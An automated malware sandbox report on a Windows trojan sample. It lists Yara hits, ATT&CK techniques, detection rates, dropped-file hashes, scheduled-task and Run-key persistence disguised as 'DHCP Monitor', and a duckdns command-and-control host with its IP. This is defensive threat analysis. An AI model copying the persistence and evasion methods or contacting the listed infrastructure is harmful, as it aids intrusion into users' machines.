        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsProcess Injection212Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information2Security Account ManagerSystem Information Discovery25SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing41NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsSecurity Software Discovery14SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol21Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 384149 Sample: bGf2H3tXGg.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus detection for dropped file 2->63 65 14 other signatures 2->65 8 bGf2H3tXGg.exe 18 2->8         started        12 dhcpmon.exe 16 2->12         started        14 bGf2H3tXGg.exe 16 2->14         started        16 dhcpmon.exe 16 2->16         started        process3 file4 49 C:\Users\user\AppData\Local\...\xktfu.dll, PE32 8->49 dropped 69 Detected unpacking (changes PE section rights) 8->69 71 Detected unpacking (overwrites its own PE header) 8->71 73 Uses schtasks.exe or at.exe to add and modify task schedules 8->73 75 Contains functionality to prevent local Windows debugging 8->75 18 bGf2H3tXGg.exe 1 16 8->18         started        51 C:\Users\user\AppData\Local\...\xktfu.dll, PE32 12->51 dropped 77 Maps a DLL or memory area into another process 12->77 23 dhcpmon.exe 3 12->23         started        53 C:\Users\user\AppData\Local\...\xktfu.dll, PE32 14->53 dropped 25 bGf2H3tXGg.exe 3 14->25         started        55 C:\Users\user\AppData\Local\...\xktfu.dll, PE32 16->55 dropped 27 dhcpmon.exe 2 16->27         started        signatures5 process6 dnsIp7 57 backu4734.duckdns.org 40.71.91.165, 49708, 49710, 49711 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->57 37 C:\Program Files (x86)\...\dhcpmon.exe, PE32 18->37 dropped 39 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 18->39 dropped 41 C:\Users\user\AppData\Local\...\tmpDE28.tmp, XML 18->41 dropped 43 C:\...\dhcpmon.exe:Zone.Identifier, ASCII 18->43 dropped 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->67 29 schtasks.exe 1 18->29         started        31 schtasks.exe 1 18->31         started        45 C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII 23->45 dropped 47 C:\Users\user\AppData\...\bGf2H3tXGg.exe.log, ASCII 25->47 dropped file8 signatures9 process10 process11 33 conhost.exe 29->33         started        35 conhost.exe 31->35         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        bGf2H3tXGg.exe51%VirustotalBrowse
        bGf2H3tXGg.exe16%MetadefenderBrowse
        bGf2H3tXGg.exe69%ReversingLabsWin32.Trojan.Zenpak
        bGf2H3tXGg.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll100%AviraHEUR/AGEN.1120893
        C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll100%AviraHEUR/AGEN.1120893
        C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll100%AviraHEUR/AGEN.1120893
        C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll100%AviraHEUR/AGEN.1120893
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe51%VirustotalBrowse
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe16%MetadefenderBrowse
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe69%ReversingLabsWin32.Trojan.Zenpak
        C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll19%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll14%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll41%ReversingLabsWin32.Trojan.InjectorX
        C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll19%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll14%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll41%ReversingLabsWin32.Trojan.InjectorX
        C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll19%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll14%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll41%ReversingLabsWin32.Trojan.InjectorX
        C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll19%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll14%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll41%ReversingLabsWin32.Trojan.InjectorX

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        3.2.bGf2H3tXGg.exe.4e70000.16.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        22.2.dhcpmon.exe.2430000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        0.0.bGf2H3tXGg.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        12.2.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        22.1.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        15.2.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        15.2.dhcpmon.exe.10000000.5.unpack100%AviraHEUR/AGEN.1120893Download File
        14.1.bGf2H3tXGg.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        14.2.bGf2H3tXGg.exe.4a80000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        12.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        22.2.dhcpmon.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        11.2.bGf2H3tXGg.exe.10000000.5.unpack100%AviraHEUR/AGEN.1120893Download File
        11.2.bGf2H3tXGg.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        11.0.bGf2H3tXGg.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        17.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        22.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        0.2.bGf2H3tXGg.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        12.2.dhcpmon.exe.10000000.5.unpack100%AviraHEUR/AGEN.1120893Download File
        14.2.bGf2H3tXGg.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        3.0.bGf2H3tXGg.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        15.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        0.2.bGf2H3tXGg.exe.10000000.5.unpack100%AviraHEUR/AGEN.1120893Download File
        14.0.bGf2H3tXGg.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        3.2.bGf2H3tXGg.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        17.2.dhcpmon.exe.4a60000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        3.1.bGf2H3tXGg.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        17.2.dhcpmon.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

        Domains

        SourceDetectionScannerLabelLink
        backu4734.duckdns.org1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        backu4734.duckdns.org1%VirustotalBrowse
        backu4734.duckdns.org0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        backu4734.duckdns.org
        		40.71.91.165
        		truetrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        backu4734.duckdns.orgtrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nsis.sf.net/NSIS_ErrorbGf2H3tXGg.exefalse
          		high
          http://nsis.sf.net/NSIS_ErrorErrorbGf2H3tXGg.exefalse
            		high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            40.71.91.165
            		backu4734.duckdns.orgUnited States
            		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:384149
            Start date:08.04.2021
            Start time:17:20:12
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 12m 38s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:bGf2H3tXGg.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@18/24@16/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 13.5% (good quality ratio 12.3%)
            • Quality average: 75.8%
            • Quality standard deviation: 32.1%
            HCA Information:
            • Successful, ratio: 95%
            • Number of executed functions: 195
            • Number of non-executed functions: 71
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 168.61.161.212, 104.42.151.234, 23.54.113.53, 104.43.193.48, 13.64.90.137, 95.100.54.203, 20.82.209.183, 23.10.249.43, 23.10.249.26, 20.82.210.154, 20.54.26.129
            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            17:21:09API Interceptor838x Sleep call for process: bGf2H3tXGg.exe modified
            17:21:17Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\Desktop\bGf2H3tXGg.exe" s>$(Arg0)
            17:21:20Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
            17:21:21AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            17:21:30API Interceptor2x Sleep call for process: dhcpmon.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            40.71.91.165zr0evNqvkC.exeGet hashmaliciousBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              backu4734.duckdns.orgzr0evNqvkC.exeGet hashmaliciousBrowse
              • 40.71.91.165

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              MICROSOFT-CORP-MSN-AS-BLOCKUSsecuredmessage.htmGet hashmaliciousBrowse
              • 52.239.152.74
              Fattura di errore.exeGet hashmaliciousBrowse
              • 104.209.133.4
              PaymentAdvice.exeGet hashmaliciousBrowse
              • 52.142.208.184
              Signed pages of agreement copy.htmlGet hashmaliciousBrowse
              • 52.97.232.194
              zr0evNqvkC.exeGet hashmaliciousBrowse
              • 40.71.91.165
              uGSmoUM8Ex.exeGet hashmaliciousBrowse
              • 52.169.150.217
              New Orders.exeGet hashmaliciousBrowse
              • 104.209.133.4
              6r3kQ7Ddkk.dllGet hashmaliciousBrowse
              • 204.79.197.200
              S9LQJCAiXi.exeGet hashmaliciousBrowse
              • 40.122.131.23
              sample.exeGet hashmaliciousBrowse
              • 40.91.125.204
              wzdu53.exeGet hashmaliciousBrowse
              • 52.239.137.4
              bank details.exeGet hashmaliciousBrowse
              • 20.43.32.222
              covid.exeGet hashmaliciousBrowse
              • 168.62.194.64
              1drive.exeGet hashmaliciousBrowse
              • 137.117.64.85
              onbgX3WswF.exeGet hashmaliciousBrowse
              • 52.142.208.184
              scan-100218.docmGet hashmaliciousBrowse
              • 51.145.124.145
              Honeywell Home_v5.3.0_apkpure.com_20201208.apkGet hashmaliciousBrowse
              • 52.232.209.85
              bcex.apk.1Get hashmaliciousBrowse
              • 52.175.56.158
              Transfer Form.exeGet hashmaliciousBrowse
              • 20.43.32.222
              PaymentInvoice.exeGet hashmaliciousBrowse
              • 52.142.208.184

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Category:dropped
              Size (bytes):702907
              Entropy (8bit):5.903583773476114
              Encrypted:false
              SSDEEP:6144:69X0GFb/PdSrw+uHwUa5EIZUNf5F6p363E+r+voPIQLAoxQHHmAOZPBwf9:M0o1+Bvgs36pcoPIWPxUH1F
              MD5:F72A7FD231E50F9B43C3DAB470364846
              SHA1:1AC9F0876EC8F4B95FB0BBAE48C2A5B5D02ED411
              SHA-256:FB01157B437B00F34999FAA320BB55C8E44BDBB415E9A15503035BFE0E1D40D6
              SHA-512:C12BC1D2B74C2F209EADD40C02A56EE4B1A21287AB5B3391118F1FA12971C39DCBE2B8174B43A4D19281680247398140B223E0F00F03896B71AA8AA2352C084E
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Virustotal, Detection: 51%, Browse
              • Antivirus: Metadefender, Detection: 16%, Browse
              • Antivirus: ReversingLabs, Detection: 69%
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f..........H3............@..........................0............@.................................D.......................................................................................................................text...Wd.......f.................. ..`.rdata...............j..............@..@.data...8U...........~..............@....ndata...................................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................
              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview: [ZoneTransfer]....ZoneId=0
              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bGf2H3tXGg.exe.log
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.355304211458859
              Encrypted:false
              SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
              MD5:69206D3AF7D6EFD08F4B4726998856D3
              SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
              SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
              SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.355304211458859
              Encrypted:false
              SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
              MD5:69206D3AF7D6EFD08F4B4726998856D3
              SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
              SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
              SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
              C:\Users\user\AppData\Local\Temp\nejus0or2e4wbg8rhay
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:data
              Category:dropped
              Size (bytes):283136
              Entropy (8bit):7.999260184879652
              Encrypted:true
              SSDEEP:6144:3w+uHwUa5EIZUNf5F6p363E+r+voPIQLAoxQHHmAOZPBwfY:g+Bvgs36pcoPIWPxUH1g
              MD5:285906EFB24E6C8780A7F2E30BDBE72A
              SHA1:5CBAE1392002A6956635E15DB5147F85620F30E8
              SHA-256:AF23271A22B4657CF3765BB7A1A40E130CB9145D4549D004CF9BAF1C4CB854CA
              SHA-512:BFC53D9B2047DB89CB5828C49C12CA68BB999F9633EE8FD11BB9E110634812F18137280E6DE79AFD1C3B83731E4F21F6300F92BFDD9917ED6576F3111144A8CE
              Malicious:false
              Preview: .\.5...x).....b?...k.1P&........f.p...3..d.;.vR7.P...c....1...u.aH...hSE}...^&.@wL..DI.........I.`VS..v..J..*o.A...@..\..S#..aU ....%......!I...Ym.V....#..r6..o..YbA.bN..../.....sj.T..EX..G...F...kG.}7#6x....<.}......L..K.D..H.#a...~:_.'............9M..\...).<..6.;.(..v.......d.P.4....H..c.m.s4-=..N.........l...,.j'....Y.*.Ex..F.5c?..c>....qhq...#..>.nm.{.xp....$M.}.V.?[uY.(.&.TW..#..=....M.....k......ln..W.j.cbX......6F.D.>...x..K.:_.f3kD..l...^...q9.vW.@.3.OG..`.9...fPc..!..'c0.r.}.?...O...%.*.EY%H.+.y.]..D.f.:....M.I...X=.1.U....K}.I...aY.N...c...M.....G.........8..dw.m...L..O.@^..a>.....?...[9.T":..dO0..1.$......?8..rs..n&U. h.[e...N. *h....T..MW$....!.&2...@.Y.bL..Gv.L...|.2....4{wEZ.iB....n.....P.6z.c...R.z...>.O#rr..p....H...O..NkjZ*w...'{..L....]]Q...s5...o....}.6.f.....)>R`.l.5A....{.A..z....'.b..A..];d.2.w..P...-.....X.>W#...0.o.#S2%..U..m..K.............h%...H.5A...Ul....:1....3......A...iN...JI.C..=....Z..q.3.C..r..C..Y....}
              C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):4.042717862409682
              Encrypted:false
